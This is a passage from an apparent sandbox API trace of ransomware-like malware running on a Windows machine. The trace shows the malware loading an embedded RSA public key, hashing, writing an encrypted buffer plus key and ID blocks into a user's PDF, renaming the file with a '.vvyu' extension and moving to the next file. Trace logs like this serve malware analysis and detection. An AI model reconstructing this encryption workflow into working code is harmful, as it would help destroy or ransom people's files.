KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.089] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0192.090] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.090] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.090] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.090] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.090] GetLastError () returned 0x0 [0192.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.091] GetLastError () returned 0x0 [0192.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.091] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.091] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0192.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.092] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.092] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.092] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf0c0) returned 0x2d45778 [0192.093] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41968 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d419b0 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.094] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39cb8 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.097] GetCurrentThreadId () returned 0x264 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44ea0 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.098] GetCurrentThreadId () returned 0x264 [0192.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d18 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cd0 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ca0 [0192.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d30 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39d00 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d48 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ce8 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d48 | out: hHeap=0x6a0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0192.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d30 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0192.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d419b0 | out: hHeap=0x6a0000) returned 1 [0192.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0192.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.109] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xf0bf, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xf0bf, lpOverlapped=0x0) returned 1 [0192.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.110] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf0c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.110] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.112] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.112] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.112] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.112] CloseHandle (hObject=0x584) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0192.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0192.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0192.114] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\tEiHH.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\teihh.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\tEiHH.pdf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\teihh.pdf.vvyu")) returned 1 [0192.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.116] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0192.121] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9ca83f0, ftCreationTime.dwHighDateTime=0x1d89c82, ftLastAccessTime.dwLowDateTime=0xa5119120, ftLastAccessTime.dwHighDateTime=0x1d8a0e0, ftLastWriteTime.dwLowDateTime=0xa5119120, ftLastWriteTime.dwHighDateTime=0x1d8a0e0, nFileSizeHigh=0x0, nFileSizeLow=0x815a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XvrsId5WMhv8lJp8.ots", cAlternateFileName="XVRSID~1.OTS")) returned 1 [0192.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0192.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) 